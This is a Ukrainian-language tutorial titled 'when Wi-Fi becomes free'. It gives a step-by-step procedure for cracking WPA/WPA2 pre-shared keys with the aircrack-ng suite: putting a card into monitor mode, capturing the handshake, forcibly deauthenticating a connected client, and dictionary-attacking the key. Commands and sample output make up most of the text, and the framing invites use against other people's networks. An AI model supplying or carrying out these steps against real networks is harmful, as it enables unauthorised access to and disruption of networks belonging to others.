коли Wi-Fi стає безкоштовним..

9

Існує важлива відмінність між зломом WPA/WPA2 і WEP. Якщо у WEP для прискорення процесу злому використовуються статистичні методи, WPA можна зламати тільки методом прямого перебору. Це відбувається через відсутність постійного ключа, тому збір початкових векторів (IV) аж ніяк не прискорить процес злому, як це було б при атаці на WEP. Єдиний спосіб отримати потрібну інформацію – почати перехоплення пакетів у момент встановлення з’єднання між клієнтом і AP. Установка з’єднання відбувається в той момент, коли клієнт входить в мережу (це не зовсім вірно, але в контексті даного документа, будемо керуватися цим). Довжина PSK може складати від 8 до 63 символів, і чим вона більше, тим менше ймовірність успішного злому.

Але не все так безнадійно. У разі, якщо ключ є словниковим словом або ж менше 8 символів, злом можливий. Звідси, до речі, зрозуміло, як створити неломаемую мережа – досить використовувати WPA/WPA2 і ключ завдовжки 63 байта, який складається з випадкового набору букв, цифр і псевдосимволов.

Повний перебір – заняття не з легких. Оскільки потрібні серйозні обчислення, комп’ютер може перевіряти від 50 до 300 ключів в секунду, в залежності від потужності процесора. Перебір досить великого словника може зайняти години, якщо не дні, а якщо ви хочете створити свій власний файл словника, який включає в себе всі комбінації літер, цифр і псевдосимволов, скористайтеся калькулятором часу перебору (http://lastbit.com/pswcalc.asp). Наприклад, перебір пароля довжиною 6 символів, що складається з букв верхнього, нижнього регістрів і цифр, займе 64 години, а повний перебір вже 7-й символьного пароля – шість місяців. Думаю, не варто говорити про 29 років на перебір 8 символів.

Відмінностей між зломом WPA і WPA2 немає, там використовується однакова аутентифікація, тому технологія та сама.

Умови роботи

коли Wi-Fi стає безкоштовним.. Показати / Приховати текст
• ви використовуєте пропатчені драйвера, які вміють робити інжекції (http://www.aircrack-ng.org/doku.php?id=injection_test – тут розказано, як це перевірити);
• ви досить близькі до клієнта, щоб відправляти і отримувати від нього дані. Запам’ятайте, то, що ви можете отримувати пакети від AP, ще не означає, що у вас є можливість відправляти на неї дані. Потужність точки вище потужності вашої карти. Перевірити можливість відправки пакетів можна за лінком, зазначеному в пункті вище;
• ви використовуєте aircrack-ng 0.9 stable (інакше деякі параметри можуть бути іншими).

Перевірте, що всі умови дотримані, інакше нижченаведені поради навряд чи вам допоможуть. Також, не забудьте замінити ath0 на ім’я інтерфейсу вашої бездротової картки.

Оточення

коли Wi-Fi стає безкоштовним.. Показати / Приховати текст
Щоб перевірити дане керівництво в домашніх умовах, вам необхідно мати дві безпровідні картки. Ми використовуємо наступні пристрої:

• Атакується клієнт з WPA2:
— MAC: 00:0F:B5:FD:FB:C2
• AP:
— ESSID: teddy
— MAC: 00:14:6C:7E:40:80
— Channel: 9
• Система AirCrack-ng:
— MAC: 00:0F:B5:88:AC:82

Рішення

Передмова

Наша мета – захопити пакети під час встановлення захищеного з’єднання і використовувати aircrack-ng для злому PSK. Це можна зробити активним і пасивним способом. Активний полягає в посилці деаутентификационного пакету клієнту, пасивний — в очікуванні, поки клієнт почне встановлювати WPA/WPA2 з’єднання самостійно. Перевага пасивного способу в тому, що відсутня необхідність в інжекції, тому реалізація атаки можлива і під Windows.

Ось наші основні кроки:

коли Wi-Fi стає безкоштовним.. Показати / Приховати текст
запустити бездротовий інтерфейс в режимі моніторингу на AP каналі;
запустити на цьому ж каналі airodump-ng з фільтром за bssid;
використовувати aireplay-ng, щоб деаутентифицировать бездротового клієнта;
використовувати aircrack-ng для злому PSK ключа.


Крок 1: запуск бездротового інтерфейсу в режимі моніторингу

коли Wi-Fi стає безкоштовним.. Показати / Приховати текст
Отже, нам необхідно включити режим моніторингу. У цьому режимі бездротова карта ловить всі пакети в ефірі, замість звичайного режиму, коли вона «чує» тільки те, що адресовано їй. Перехоплюючи кожен пакет, ми можемо уловити момент 4-х етапної WPA/WPA2 аутентифікації.

Для початку зупинимо ath0:

# airmon-ng stop ath0

Interface Chipset Driver

wifi0 Atheros madwifi-ng
ath0 Atheros madwifi-ng VAP (parent: wifi0) (VAP destroyed)

Переконаємося, що немає інших athX інтерфейсів:

# iwconfig

lo no wireless extensions.
eth0 no wireless extensions.
wifi0 no wireless extensions.

Якщо ще якісь athX присутні, зупиніть їх теж. Тепер встановимо бездротову карту на канал 9 в режимі моніторингу:

# airmon-ng start wifi0 9

У цій команді ми використовуємо «wifi0» замість звичного «ath0», оскільки використовуємо драйвера madwifi-ng. Відповіддю буде щось на кшталт:

Interface Chipset Driver

wifi0 Atheros madwifi-ng
ath0 Atheros madwifi-ng VAP (parent: wifi0) (monitor mode enabled)

Зверніть увагу на рядок monitor mode enabled. Щоб перевірити, що інтерфейс правильно налаштований, запустіть:

# iwconfig

lo no wireless extensions.
wifi0 no wireless extensions.
eth0 no wireless extensions.
ath0 IEEE 802.11 g ESSID:»» Nickname:»»
Mode:Monitor Frequency:2.452 GHz Access Point: 00:0F:B5:88:AC:82
Bit Rate:0 kb/s Tx-Power:18 dBm Sensitivity=0/3
Retry:off RTS thr:off Fragment thr:off
Encryption key:off
Power Management:off
Link Quality=0/94 Signal level=-95 dBm Noise level=-95 dBm
Rx invalid nwid:0 Rx invalid crypt:0 Rx invalid frag:0
Tx excessive retries:0 Invalid misc:0 Missed beacon:0

Ви бачите, що ath0 працює в режимі моніторингу, на частоті 2.452, що відповідає 9 каналу, і що в AP варто MAC-адресу вашої карти. На відміну від всіх інших, тільки драйвера madwifi-ng показують вашу адресу в полі AP. Отже, все відмінно. Дуже важливим моментом є перевірка всіх даних перед безпосереднім процесом злому. Якщо щось не так, подальші кроки можуть виявитися марними. Переконатися у відповідності частоти бездротовий картки каналу можна за цією адресою: http://www.rflinx.com/help/calculations/#2.4ghz_wifi_channels.

Крок 2: airodump-ng

коли Wi-Fi стає безкоштовним.. Показати / Приховати текст
Мета цього кроку – відловити момент встановлення безпечного з’єднання з AP.

# airodump-ng -c 9 —bssid 00:14:6C:7E:40:80 -w psk ath0

-9 – це канал, на якому працює бездротова мережа
—bssid 00:14:6C:7E:40:80 – MAC-адресу AP. Цей параметр відфільтрує «лівий» трафік
-w psk – ім’я файлу, в який будуть записуватися спіймані IV
ath0 – ім’я нашого бездротового інтерфейсу

Важливо: не використовуйте параметр —ivs. Ви повинні захоплювати пакети цілком. Отже, у разі, якщо до точки приєднаний клієнт, на екрані з’явиться щось на зразок цього:

CH 9 ][ Elapsed: 4 s ][ 2007-03-24 16:58

BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID

00:14:6C:7E:40:80 39 100 51 116 14 9 54 WPA2 CCMP PSK teddy

BSSID STATION PWR Lost Packets Probes

00:14:6C:7E:40:80 00:0F:B5:FD:FB:C2 35 0 116

А якщо клієнтів в даний момент немає, то це:

CH 9 ][ Elapsed: 4 s ][ 2007-03-24 16:58

BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID

00:14:6C:7E:40:80 39 100 51 0 0 9 54 WPA2 CCMP PSK teddy

Уточнимо, що іноді для перехоплення моменту встановлення з’єднання доводиться робити додаткові рухи. Ваша картка повинна бути в тому ж режимі, що AP і клієнтський пристрій. Наприклад, якщо ваша картка в режимі B, а клієнт у режимі G, то відловити аутентифікацію не вийде. Також, іноді буває потрібно виставити ту ж швидкість, наприклад 11 Мб або 54 Мб. Загалом, якщо не вдалося перехопити установку з’єднання відразу, слід поекспериментувати.

Крок 3: використовуємо aireplay-ng, щоб від’єднати клієнта.

коли Wi-Fi стає безкоштовним.. Показати / Приховати текст
Цей крок необов’язковий і виконується лише в тому випадку, коли ви хочете прискорити процес злому. Природно, для виконання нижчезазначених дій необхідно, щоб до точки був приєднаний хоча б один клієнт. Якщо в даний момент жодних бездротових клієнтів не спостерігається, розслабтеся і переходите відразу до наступного кроку. Звичайно, якщо в подальшому бездротової клієнт з’явиться, ніхто не заважає вам повернутися і виконати всі описані нижче команди.

Отже, на даному етапі ми посилаємо бездротовому клієнту повідомлення про те, що він більше не асоційований з AP. Клієнт спробує встановити з’єднання заново і пошле саме ті пакети, які нам потрібні.

Ґрунтуючись на отриманих даних з попереднього кроку, виконаємо на інший консолі наступну команду:

# aireplay-ng -0 1 -a 00:14:6C:7E:40:80 -c 00:0F:B5:FD:FB:C2 ath0

-0 означає деаутентификацию
1 – кількість деаутентификационных пакетів (можна збільшити)
-a 00:14:6C:7E:40:80 – MAC-адресу AP
-з 00:0F:B5:FD:FB:C2 – MAC-адресу клієнта отсекаемого
ath0 – ім’я нашої бездротовий картки.

Відповідь має бути таким:

11:09:28 Sending DeAuth to station — STMAC: [00:0F:B5:34:30:30]

Деаутентификационный пакет шле безпосередньо з вашого комп’ютера на комп’ютер клієнта, тому переконайтеся, що ви перебуваєте досить близько до останнього.

Крок 4: запускаємо aircrack-ng і ламаємо PSK ключ.

коли Wi-Fi стає безкоштовним.. Показати / Приховати текст
Мета цього кроку – спробувати зламати PSK ключ шляхом підбору за словником. Невеликий словничок йде в комплекті з aircrack-ng (password).lst), більш об’ємні словники можна легко знайти в мережі або створити самостійно за допомогою відомої програми John the Ripper.

Відкриваємо нову консоль і запускаємо:

# aircrack-ng -w password.lst -b 00:14:6C:7E:40:80 psk*.cap

-w password.lst призначає ім’я файлу зі словником
psk*.cap призначає ім’я файлу з перехваченными пакетами. Маска «*» використовується, оскільки файл може бути не один.

У разі, якщо аутентифікаційні пакети не знайдені, висновок буде приблизно таким:

Opening psk-01.cap
Opening psk-02.cap
Opening psk-03.cap
Read 1827 packets.
No valid WPA handshakes found.
Якщо це трапилось, спробуйте повторити третій крок і заново вибити бездротового клієнта з мережі, щоб він повторив процедуру встановлення з’єднання. Якщо ви використовували пасивний метод збирання пакетів, чекайте далі, поки не з’явиться клієнт, встановлює з’єднання. Висновок у разі знаходження відповідних пакетів буде таким:

Opening psk-01.cap
Opening psk-02.cap
Opening psk-03.cap
Opening psk-04.cap
Read 1827 packets.

# BSSID ESSID Encryption

1 00:14:6C:7E:40:80 teddy WPA (1 handshake)

Choosing first network as target.

З цього моменту aircrack-ng може почати злом PSK ключа. В залежності від швидкості вашого процесора і розміру словника, цей процес може зайняти години або дні. Успішний злом ключа виглядає так:

Aircrack-ng 0.8

[00:00:00] 2 keys tested (37.20 k/s)

KEY FOUND! [ 12345678 ]

Master Key : CD 69 0D 11 8E AC AA C5 C5 EC BB 59 85 7D 49 3E

B8 A6 13 C5 4A 72 82 38 ED C3 7E 2C 59 5E AB FD

Transcient Key : 06 F8 BB F3 B1 55 AE EE 1F 66 AE 51 1F F8 12 98

CE 8A 9D A0 FC ED A6 DE 70 84 BA 90 83 7E CD 40

FF 1D 41 E1 65 17 93 0E 64 32 BF 25 50 D5 4A 5E

2B 20 90 8C EA 32 15 A6 26 62 93 27 66 66 E0 71

EAPOL HMAC : 4E 27 D9 5B 00 91 53 57 88 9C 66 C8 B1 29 D1 CB